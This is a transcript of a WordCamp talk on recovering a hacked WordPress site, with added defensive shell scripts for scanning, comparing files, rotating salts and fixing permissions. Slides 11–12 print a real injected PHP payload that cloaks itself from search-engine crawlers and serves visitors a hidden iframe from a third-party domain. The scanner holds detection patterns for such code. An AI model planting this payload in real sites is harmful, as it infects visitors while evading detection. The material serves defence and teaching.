Your Site Has Been Hacked, Now What?


Transcript of Your Site Has Been Hacked, Now What?

Page 1: Your Site Has Been Hacked, Now What?

Your Site Has Been Hacked, Now What?

Michele Butcher, CantSpeakGeek.com, WPSecurityLock.com

@Michele_Butcher

Slides can be found at: http://mlb.pw/WCSD2015

Page 2: Your Site Has Been Hacked, Now What?

WordPress Specialist at WP Security Lock

Head Geek at Can't Speak Geek

Sometimes a designer of pretty websites and graphics

Southern Illinois Meetup Co-Organizer

Beginners and Intermediate WordPress Instructor at John A Logan College

Michele Butcher

Page 3: Your Site Has Been Hacked, Now What?

It all starts one dreadful morning…

Page 4: Your Site Has Been Hacked, Now What?

First you see this

Page 5: Your Site Has Been Hacked, Now What?

Then you realize this has happened

Page 6: Your Site Has Been Hacked, Now What?

Which made you feel like this…

Page 7: Your Site Has Been Hacked, Now What?

What do you do when your site gets hacked?

Page 8: Your Site Has Been Hacked, Now What?

First option: Pay someone else to clean it.

There are many services that will clean your site. Here are the ones I suggest.

WP Security Lock https://wpsecuritylock.com

Sucuri Security http://sucuri.net/

Hack Repair http://hackrepair.com

Page 9: Your Site Has Been Hacked, Now What?

Second Option: Clean it yourself

• Cheapest

• Most time consuming

• No one knows your site better than you do

• You just have to know what to look for

I do not suggest this if you are not comfortable reading HTML, PHP, and CSS.

Page 10: Your Site Has Been Hacked, Now What?

Pretty Code

Page 11: Your Site Has Been Hacked, Now What?

Not So Pretty Code

<?php eval(base64_decode('...'));

(The slide shows the full base64 string inside the eval(); Page 12 shows what it decodes to.)

Page 12: Your Site Has Been Hacked, Now What?

<?php
error_reporting(0); // silence PHP errors so the injected code never shows itself on the page
$bot = FALSE ;

// User-agent fragments of crawlers, scanners and feed readers the payload hides from
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex',
    'mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345',
    'httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de',
    'rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx',
    'szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');

// IP ranges (largely search-engine crawlers) that must never be served the iframe,
// so the site keeps looking clean to Google and to the owner's scanners
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    array("64.68.80.0" ,"64.68.87.255" ),
    array("66.102.0.0", "66.102.15.255"),
    array("64.233.160.0","64.233.191.255"),
    array("66.249.64.0", "66.249.95.255"),
    array("72.14.192.0", "72.14.255.255"),
    array("209.85.128.0","209.85.255.255"),
    array("198.108.100.192","198.108.100.207"),
    array("173.194.0.0","173.194.255.255"),
    array("216.33.229.144","216.33.229.151"),
    array("216.33.229.160","216.33.229.167"),
    array("209.185.108.128","209.185.108.255"),
    array("216.109.75.80","216.109.75.95"),
    array("64.68.88.0","64.68.95.255"),
    array("64.68.64.64","64.68.64.127"),
    array("64.41.221.192","64.41.221.207"),
    array("74.125.0.0","74.125.255.255"),
    array("65.52.0.0","65.55.255.255"),
    array("74.6.0.0","74.6.255.255"),
    array("67.195.0.0","67.195.255.255"),
    array("72.30.0.0","72.30.255.255"),
    array("38.0.0.0","38.255.255.255")
);

// Is the visitor's IP inside one of the ranges above?
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0]));
    $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}

// Does the visitor's user agent look like a crawler?
foreach ($user_agent_to_filter as $bot_sign){
    if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}

// Only ordinary visitors receive the 2x2 iframe, pushed thousands of pixels off-screen,
// which loads content from a third-party domain without anything being visible
if (!$bot) {
    echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>';
}
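The two slides above show the same injection in its obfuscated and decoded forms. As an added example (not part of the talk), this script walks a WordPress tree and flags PHP files carrying either tell-tale: an eval() fed by a decoder, or an off-screen iframe like the one the decoded payload prints. The sample files it scans are constructed here, with a placeholder domain instead of the one on the slide.

```shell
#!/bin/sh
# Added example, not from the slides: flag PHP files that carry the pattern on
# slides 11 and 12 (eval() of a decoded blob) or the off-screen iframe the
# decoded payload prints. Report only; the files are left for a human to read.
scan_suspicious_php() {
  root="$1"
  find "$root" -type f -name '*.php' | LC_ALL=C sort | while IFS= read -r f; do
    # eval() fed by a decoder is how injected code hides its real contents.
    if grep -qE 'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)' "$f"; then
      printf 'OBFUSCATED_EVAL %s\n' "$f"
    fi
    # A 2x2 iframe, or a block pushed thousands of pixels off-screen, exists
    # only so visitors load it without ever seeing it.
    if grep -qiE '<iframe[^>]*(width|height)="[0-2]"' "$f" ||
       grep -qiE 'position:[[:space:]]*absolute;[[:space:]]*left:[[:space:]]*-[0-9]{3,}px' "$f"; then
      printf 'HIDDEN_IFRAME %s\n' "$f"
    fi
  done
}

# Number of findings; handy for a cron job that only mails when it is non-zero.
count_suspicious() {
  scan_suspicious_php "$1" | wc -l | tr -d ' '
}

# Constructed samples: a clean file, one with the slide's eval() wrapper (the
# base64 here is just "ABC"), and one printing the decoded payload's iframe
# with the domain replaced by a placeholder.
demo=$(mktemp -d)
printf '<?php\necho "hello";\n' > "$demo/clean.php"
printf "<?php eval(base64_decode('QUJD'));\n" > "$demo/injected.php"
cat > "$demo/iframe.php" <<'EOF'
<?php echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://example.invalid/" width="2" height="2"></iframe></div>';
EOF
scan_suspicious_php "$demo"
rm -rf "$demo"
```

Every hit is a file to open and read, not necessarily malware; a few legitimate plugins do decode base64, but they are rare enough that each one is worth a look.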

Page 13: Your Site Has Been Hacked, Now What?

When cleaning your site, pull in clean copies of core, your theme, and your plugins; it makes cleaning so much easier.
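The clean copies pay off when you compare them against the live install. As an added example (not part of the talk), this script lists files that differ, files present only on the live side, and files missing from it. It assumes both trees are already unpacked and skips wp-config.php and the uploads directory, which always differ from a fresh download.

```shell
#!/bin/sh
# Added example, not from the slides: compare the live install against a fresh
# download of the same core/theme/plugin versions. Files that differ or exist
# only on the live side are where injected code hides; files missing from the
# live side may have been deleted. wp-config.php and uploads are skipped.
compare_with_clean() {
  clean="$1"; live="$2"
  diff -rq -x wp-config.php -x uploads "$clean" "$live" | while IFS= read -r line; do
    case "$line" in
      "Only in $live"*)          # "Only in DIR: NAME" -> file dropped on the live site
        d=${line#Only in }; d=${d%%: *}; n=${line##*: }
        rel=${d#"$live"}; rel=${rel#/}; [ -n "$rel" ] && rel="$rel/"
        printf 'ADDED    %s\n' "$rel$n" ;;
      "Only in $clean"*)         # present in the clean copy, gone from the live site
        d=${line#Only in }; d=${d%%: *}; n=${line##*: }
        rel=${d#"$clean"}; rel=${rel#/}; [ -n "$rel" ] && rel="$rel/"
        printf 'MISSING  %s\n' "$rel$n" ;;
      "Files "*" differ")        # "Files A and B differ" -> changed file
        p=${line#Files *and }; p=${p% differ}
        printf 'MODIFIED %s\n' "${p#"$live"/}" ;;
    esac
  done | LC_ALL=C sort
}

# Constructed fixture: a clean copy and a live copy with one core file modified,
# one file dropped into wp-content, one core file missing, and an upload that
# must not be reported.
clean=$(mktemp -d); live=$(mktemp -d)
for d in "$clean" "$live"; do
  mkdir -p "$d/wp-includes" "$d/wp-content/uploads"
  printf '<?php require "wp-blog-header.php";\n' > "$d/index.php"
  printf '<?php $wp_version = "4.3";\n' > "$d/wp-includes/version.php"
  printf '<?php\n' > "$d/wp-content/index.php"
done
printf '<?php\n' > "$clean/wp-includes/functions.php"
printf '// injected line\n' >> "$live/wp-includes/version.php"
printf '<?php\n' > "$live/wp-content/dropped.php"
printf 'jpeg bytes\n' > "$live/wp-content/uploads/photo.jpg"
compare_with_clean "$clean" "$live"
rm -rf "$clean" "$live"
```

Anything under ADDED or MODIFIED gets read before the clean copy overwrites it, because that is where the entry point usually is.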

Page 14: Your Site Has Been Hacked, Now What?

This is a good time to audit everything on your site and delete what is not being used. You can always add other themes and plugins back later when you need them.

Page 15: Your Site Has Been Hacked, Now What?

Now that you have all the malware removed, that does not mean you are done.

Page 16: Your Site Has Been Hacked, Now What?

Change the salts in your wp-config.php file
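Changing the salts invalidates every login cookie issued while the site was compromised. As an added example (not part of the talk), this script rewrites the eight keys and salts in wp-config.php with values generated locally; WordPress's own generator at https://api.wordpress.org/secret-key/1.1/salt/ produces the same kind of output if you prefer to paste. It assumes the standard define('NAME', '...') lines and works on a constructed copy of the file.

```shell
#!/bin/sh
# Added example, not from the slides: give wp-config.php eight fresh keys and
# salts generated locally, so cookies signed with the old values stop validating.
# WordPress's generator at https://api.wordpress.org/secret-key/1.1/salt/ does the
# same job; this version needs no network access.
WP_SALT_NAMES="AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT"

# 64 random characters from a set that is safe inside a PHP single-quoted
# string and inside the sed replacement below (no quote, backslash, &, or |).
random_salt() {
  LC_ALL=C tr -dc 'A-Za-z0-9!#$%()*+,./:;<=>?@^_~' </dev/urandom | head -c 64
}

# Rewrite each  define('NAME', '<old>');  line in place, keeping a .bak copy.
# Matches both define('X', ...) and the newer define( 'X', ... ) spacing.
rotate_salts() {
  cfg="$1"
  cp "$cfg" "$cfg.bak"
  for name in $WP_SALT_NAMES; do
    new=$(random_salt)
    sed -i.tmp "s|define( *'$name', *'[^']*' *);|define('$name', '$new');|" "$cfg"
    rm -f "$cfg.tmp"
  done
}

# True when every key is exactly 64 characters and no shipped placeholder survives.
check_salts() {
  cfg="$1"
  for name in $WP_SALT_NAMES; do
    grep -qE "define\( *'$name', *'[^']{64}' *\);" "$cfg" || return 1
  done
  if grep -q 'put your unique phrase here' "$cfg"; then return 1; fi
  return 0
}

# Constructed wp-config.php fragment with the placeholders WordPress ships.
write_sample_config() {
  for name in $WP_SALT_NAMES; do
    printf "define('%s', 'put your unique phrase here');\n" "$name"
  done > "$1"
}

demo=$(mktemp)
write_sample_config "$demo"
rotate_salts "$demo"
cat "$demo"
rm -f "$demo" "$demo.bak"
```

Everyone, you included, is logged out after this, which is the point.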

Page 17: Your Site Has Been Hacked, Now What?

Check your users!

• You could have unwanted users

• Delete the unwanted guests immediately

• If you use “admin” as a username, delete it and make a new user with a different username

• Delete all users that are no longer using your dashboard (old devs, designers, guests)

• Only give others the access they need, not what they want. A guest blogger should never be an admin, only a contributor.

Page 18: Your Site Has Been Hacked, Now What?

Check your FTP accounts on your server

You could have unwanted users here as well

Page 19: Your Site Has Been Hacked, Now What?

Check your File Permissions

Files should be 644

Directories should be 755
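The quickest way to check those two numbers across a whole install is to let find do it. As an added example (not part of the talk), this script lists every file that is not 644 and every directory that is not 755, then fixes them; the tree it runs on is constructed here.

```shell
#!/bin/sh
# Added example, not from the slides: list every file that is not 644 and every
# directory that is not 755 under a WordPress root, then fix them. Report first;
# a world-writable file is also evidence worth looking at before it is touched.
find_bad_permissions() (
  cd "$1" || exit 1
  {
    find . -type f ! -perm 644 | sed 's|^\./|FILE |'
    find . -type d ! -name . ! -perm 755 | sed 's|^\./|DIR  |'
  } | LC_ALL=C sort
)

# Apply the two modes from the slide to everything that does not already have them.
fix_permissions() {
  find "$1" -type f ! -perm 644 -exec chmod 644 {} +
  find "$1" -type d ! -perm 755 -exec chmod 755 {} +
}

# Constructed fixture: a correct index.php, a world-writable file dropped into
# wp-content, and an uploads directory someone opened up to "make a plugin work".
demo=$(mktemp -d)
mkdir -p "$demo/wp-content/uploads"
printf '<?php\n' > "$demo/index.php";            chmod 644 "$demo/index.php"
printf '<?php\n' > "$demo/wp-content/dropped.php"; chmod 777 "$demo/wp-content/dropped.php"
chmod 755 "$demo/wp-content";                    chmod 777 "$demo/wp-content/uploads"
echo "Before:"; find_bad_permissions "$demo"
fix_permissions "$demo"
echo "After:";  find_bad_permissions "$demo"
rm -rf "$demo"
```

Run the report on a schedule; a directory that keeps turning back to 777 tells you something on the site is resetting it.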

Page 20: Your Site Has Been Hacked, Now What?

Add some Security to your site

Some trusted plugins:

• iThemes Security or iThemes Security Pro

• Jetpack (BruteProtect and VaultPress)

• Wordfence

• Sucuri Firewall

Page 21: Your Site Has Been Hacked, Now What?

Change your login information

• WordPress Logins and passwords

• cPanel Logins and passwords

• Database logins and passwords (Remember to change them in your wp-config.php)

• Hosting Logins and passwords

Page 22: Your Site Has Been Hacked, Now What?

When it comes to usernames and passwords, here are a few tips.

• NEVER use “admin” as a username and “password” as the password. NEVER on anything!

• The harder a password is to remember, the harder it is to hack

• Use something like LastPass, 1Password, or KeePass to store your passwords

Page 23: Your Site Has Been Hacked, Now What?

What do you do to not get hacked again?

Page 24: Your Site Has Been Hacked, Now What?

First and most important!

UPDATE, UPDATE, UPDATE!

Update core, update plugins, update themes!

Page 25: Your Site Has Been Hacked, Now What?

A note on updating

If you use a theme and/or plugin that was purchased from Envato, ThemeForest, or CodeCanyon, please tick the box under each purchased item on the download page to be notified by email of updates. That is the only way they notify their customers of updates.

This is part of the reason the RevSlider SoakSoak infection was so widespread.

Page 26: Your Site Has Been Hacked, Now What?

Pay attention to WordPress news and security sites

• WP Tavern

• WP Security Bloggers

• Sucuri Blog

• WP Security Lock

• Advanced WordPress (Facebook)

• Twitter

Page 27: Your Site Has Been Hacked, Now What?

Only use trusted and supported themes and plugins

Do NOT use a theme or plugin

• That has not been updated in more than a year

• Whose support forums get no responses

• That is flagged as not working in the current version of core

Page 28: Your Site Has Been Hacked, Now What?

Start Making Backups

• BackupBuddy

• BackWPup

• VaultPress (Jetpack)

• Check with your hosting company to see if they do backups as well

• iThemes Security (free and Pro) will do database backups

Page 29: Your Site Has Been Hacked, Now What?

Speaking of backups…

Save them somewhere other than your server.

Most have options to send them to an Amazon S3 account, Dropbox, email, or download to your machine.

Page 30: Your Site Has Been Hacked, Now What?

Lastly, be active with your site. You know your site best. If something does not feel right, look into it. Also, do not ignore your website. No one likes a zombie website.

Page 31: Your Site Has Been Hacked, Now What?

And remember…

Page 32: Your Site Has Been Hacked, Now What?

Don’t Let Security Make You This Guy!

Page 33: Your Site Has Been Hacked, Now What?

Questions?

Page 34: Your Site Has Been Hacked, Now What?

Thank you!

Michele Butcher

http://CantSpeakGeek.com

https://WPSecurityLock.com

@Michele_Butcher

Slides can be found at: http://mlb.pw/WCSD2015